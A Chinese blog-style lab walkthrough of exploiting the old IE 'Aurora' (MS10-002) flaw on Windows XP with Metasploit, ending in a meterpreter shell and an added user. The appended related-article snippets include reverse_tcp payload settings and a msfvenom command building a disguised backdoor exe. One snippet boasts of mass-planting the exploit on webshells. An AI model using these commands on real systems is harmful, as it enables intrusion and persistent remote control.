基于XP系统IE极光漏洞渗透

最新推荐文章于 2022-11-18 10:23:24 发布
原创 最新推荐文章于 2022-11-18 10:23:24 发布 · 752 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#msf渗透 #kali linux

本文详细介绍了一种名为极光(Aurora)的IE浏览器重大漏洞的利用过程。通过MSF框架,设置payload并配置选项,成功实现了对目标机器的远程控制,获取了管理员权限,并演示了添加用户等操作。

极光漏洞(Aurora)是一个针对IE浏览器的重大漏洞,攻击者向目标发送链接,当IE用户使用IE浏览器点击链接时,就会向攻击者反弹一个可利用的shell,同时会严重占用目标机器的CPU,导致机器卡死。那么话不多说,直接开搞。
首先,在msf搜索10_002
在这里插入图片描述
然后调用
在这里插入图片描述
然后设置payload
在这里插入图片描述
之后show options,设置选项
在这里插入图片描述
设置好了之后启动
在这里插入图片描述
已经启动成功,接下来就想办法让目标靶机用IE浏览器打开这个IP地址,由于是测试,所以我们直接用XP打开,再返回msf,可以看到
在这里插入图片描述
有一个session已经打开了,再看XP
在这里插入图片描述
一片空白,而且无法操作了,卡死在这里
回到msf
在这里插入图片描述
sessions查看当前可用,有一个,那就用!
在这里插入图片描述
Bingo!成功得到一个meterpreter,之后就可以在目标上搞事情了。
在这里插入图片描述
shell 弹回了一个我们很熟悉的cmd
在这里插入图片描述
ipconfig就可以看到目标的IP地址
在这里插入图片描述
systeminfo就可以看到目标的详细信息
在这里插入图片描述
当然,还有目标计算机上所有用户,由于XP是以管理员用户登陆的,所以这里直接拿到了管理员权限,如果是普通用户那么还需要提权。
在这里插入图片描述
给它添加一个用户
在这里插入图片描述
进入根目录查看有什么感兴趣的东西。
我们关闭掉连接
回到XP
在这里插入图片描述
登陆界面就多出来一个用户,就是我们刚才新建的,当然,实际中肯定会想办法隐藏它。

Metasploit 对 IE 浏览器极光漏洞进行渗透利用
Epsilon
03-02 5197
极光漏洞实际上是利用了堆喷射技术。下面我们来演示渗透过程。 1、查看 win xp 系统状态 目前的cpu和内存消耗极低。 2、在kali linux利用 metasploit 渗透msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/
Metasploit学习笔记之——用Metasploit模拟谷歌极光攻击
JochenZou的专栏
12-20 6404
Metasploit模拟谷歌极光攻击重现 本攻击重现是简化的一个攻击过程,省略了前期情报搜集阶段中外围信息搜索、主机探测与端口扫描、服务扫描与查点、网络漏洞扫描等工作,目的是在最短的时间内模拟渗透攻击的核心环节,是对后续的复杂网络渗透攻击和网络安全防护所做的前期工作。 1.      准备工作 1.1   攻击路线图 下图为此次实验的攻击路线图,主要实现
利用XP ie浏览器漏洞获取shell
weixin_44195546的博客
03-12 3491
实验环境:kali linux、windows XP Professional SP3. 实验工具:metasploit framework 功能实现模块:use exploit/windows/brower/ms14_064_ole_code_execution 实验过程: 1.执行模块,查看参数配置,并且设置payload(set payload windows/meterpreter/reverse_tcp): 2.其他参数无需再配置,直接run就行。(如果端口LPORT被占用了,可以用
极光行动漏洞分析
w_g3366的博客
09-04 3457
极光行动 流量分析 流量包记录不多,共39条记录,两组会话 流量包不是很多,可以直接使用流追踪分析: 会话一分析: //发起请求 GET /info HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en...
极光 0day漏洞
weixin_34198762的博客
07-05 661
不知道是不是国内首发.17号在ST核心群拿到的,18号在虚拟机2003SERVER ie7 测试成功。不过免杀做的不好一样被杀。趁国内没有大规模更新补丁之前,在webshell上大肆放马,命中率还是挺高的。下面是生成后的页面代码,其他文件就不发了.大家有兴趣可以看下---------------------------------------------------生成器代码...
ms10-002“极光漏洞漏洞复现
Ch_an_ger的博客
01-08 1950
1.漏洞原理 针对Internet Explorer“极光”内存损坏的攻击也就是IE浏览器漏洞,因此该漏洞应当不会受操作系统版本的影响; 2.准备阶段 攻击机:kali(192.168.123.21) 靶机:Windowsxp(192.168.123.55) 3.漏洞利用步骤 1)使用通过该漏洞的exp生成一个钓鱼链接,链接的监听机我暂且就设置成攻击机kali,监听端口是6666; 2)在winXP访问刚刚生成的钓鱼链接,这时XP会与监听机建立TCP连接,发送httpget请求,url地址服务器回复http
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 5186
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
内网渗透MSF框架模块详细作用介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-18 2274
Metasploit Framework(MSF) 是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
极光行动:攻击Google的代码曝光
yushiqiang1688的专栏
01-18 2132
TechWeb旗下的DarkReading发表文章,透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google被攻击的声明,承认McAfee所说的IE漏洞才是祸源。文章还给出了一个链接,指向开源渗透测试工具项目Metasploit的博客,上面给出了利用这个IE漏洞的攻击代码链接。代码如下:【去混淆后的代码】 Evalsvar n = unescap
极光漏洞源代码
03-03
极光漏洞源代码
极光漏洞扫描器安装配置
12-01
绿盟漏洞扫描极光配置 一 设备硬件 二 设备快速配置 三 漏洞扫描 四 常用工具
ms10_002(极光漏洞渗透步骤——MSF搭建钓鱼网站
渗透测试
06-07 2395
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .
Beef加载msf插件---metasploit对IE浏览器极光漏洞进行渗透利用
wkend的博客
03-22 1696
1.配置文件的修改 输入下列命令,打开配置文件, 在图中所示的地方,作出如下修改 再接着输入以下命令,打开另一个配置文件 注意下图所示的三个地方,以及user和pass 接下来切换到beef主目录之下 再开一个终端,输入msfconsole,打开msf 控制台,输入下列命令 在另一个开启的终端(就是包含beef可执行文件的目录)下输入以下命...
黑客入侵Windows XP的几个常用方法
fanyuna的专栏
04-15 1177
第一招、屏幕保护  在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。  提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的
metasploit对IE浏览器极光漏洞进行渗透利用
天元喜羊羊的博客
05-12 4976
msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > show op
渗透测试winxp
qq_45088344的博客
05-24 485
测试环境 同一网段下的kali linux(192.168.5.133)和windows xp 信息收集 用nmap搜索目标机 nmap -sn 192.168.5.0/24 创建后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.133 lport=4444 -f exe > upgrade.exe 创建后门程序后在终端输入msfconsole启动Metasploit设置以下配置 use explo.
利用IE浏览器漏洞入侵
weixin_45511599的博客
10-13 1398
目的:利用ie浏览器的aurora漏洞获得目标shell权限 实战: 1.开启渗透利用框架 msfconsole 2.搜索这个漏洞(代号 ms10-002) search ms10-002 3.使用搜索出的攻击模块 use exploit/windows/browser/ms01_002_aurora 4.显示要设置的参数 show options 5.设置参数(kali ip) set SRVHOST 192.168.1.176 set SRVPORT 8080 set URIPATH
MS10_002漏洞复现
m0_48907714的博客
03-09 3170
MS10_002漏洞复现 漏洞介绍:ms10_002漏洞,它是IE浏览器漏洞,也称“极光漏洞”,可以通过该漏洞获取目标主机的控制权。 00x01 两台虚拟机,一台为kali ip:192.168.72.4 一台为 Windows xp sp3 英文版 ip:192.168.72.6 使用的工具:msfconsole 00x02 打开两台虚拟机,打开kalimsf软件,搜索MS10_002漏洞,找到两个模块 本次复现漏洞为第一个模块exploit/windows/browser/ms10_00
Aurora漏洞
weixin_30332241的博客
01-20 324
万壑松风(silvester) http://hi.baidu.com/ccex sf.beyond@gmail.com  研究了两天,此代码利用IE内存泄露而执行远程代码, 如果代码执行成功, 服务器端则可以对其进行控制, 可以查看删除所有的文件, 查看进程等操作, 每次泄露执行成功的机率大约是30%, 页面关闭后则连接关闭, 测试主机: win2000浏览器版本: IE6.0....
解决XP系统IE7浏览器字体过小漏洞
8. 文件名称解释:文件名中的“IE7-WindowsXP”表明该补丁是针对Windows XP操作系统IE7版本的。"KB931768"是微软知识库(Knowledge Base)的文章编号,通常用来标识特定的补丁或安全更新。"x86"表示该补丁适用于32...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值